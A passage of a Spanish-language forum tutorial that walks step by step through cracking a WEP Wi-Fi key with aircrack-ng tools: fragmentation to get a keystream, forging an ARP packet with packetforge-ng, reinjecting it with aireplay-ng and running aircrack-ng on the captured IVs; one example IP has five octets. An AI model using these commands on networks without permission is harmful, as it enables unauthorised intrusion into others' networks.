como vemos en la imagen de arriba ha estado leyendo paquetes y ha seleccionado uno que será fragmentado y mandado al AP.Si el AP responde, todo habrá salido bien y se irán obteniendo bits hasta obtener los 1500 bits de un PRGA.Vamos a comprobarlo para ello pulsamos la tecla
y y damos enter:
Pues ahí lo tenemos,como veis lo que he hecho despues es forjar el paquete con packetforge-ng,para despues enviarlo al AP.En la misma shell (puede ser otra)tenemos que teclear:
Código:
packetforge-ng -0 -a (BSSID) -h (mac del cliente) -k 255.255.255.255 -l 255.255.255.255.255 -y (nuestro archivo .xor) -w arp-request
Donde:
-0 es el flag usado para forjar el paquete
-a BSSID mac del AP
-h mac del cliente asociado
-k Ip del AP
-l es la ip del cliente asociado
-y nuestro archivo .xor
-w nombre del paquete creado
Cita:
NOTA ACLARATORIA:
En los flags -k y -l yo siempre pongo -k 255.255.255.255 -l 255.255.255.255.255 por defecto pero con tcdump podeis si quereis averiguar las IPs que se necesitan y utilizarlas,yo las dejo así.
|
Bien ahora que ya tenemos nuestro paquete creado vamos a reinyectarlo en el AP,para ello tecleamos en una shell:
Código:
aireplay-ng -2 -h (mac del clente) -r arp-request wlan0
Donde:
-2 es el flag de aireplay para el reenvio de paquetes interactivo
-h mac del cliente asociado
-r nuestro paquete recien creado
wlan0 nuestra interfaz en este caso
Ahora le decimos que si otra vez tecleando
y
Y si todo ha salido bien los IVs (#Data),deberían empezar a volar,y cuando tengamos una cantidad considerable....
Como veis en la foto ya tenemos bastantes IVs (#data) ya que este ataque debería dar la clave con muchos menos.
Ahora lanzamoa Aircrack-ng,para ello tecleamos en una shell:
Código:
aircrack-ng prueba*.ivs
Donde:
* con esto le decimos que abra todos los archivos prueba.ivs que tenemos
Y aquí está,pues esto ha sido todo,para cualquier duda o si me equivoqué en algo,aquí me teneís,espero que se entiendan bien los pasos y que os sea de ayuda.
Saludos
ZERO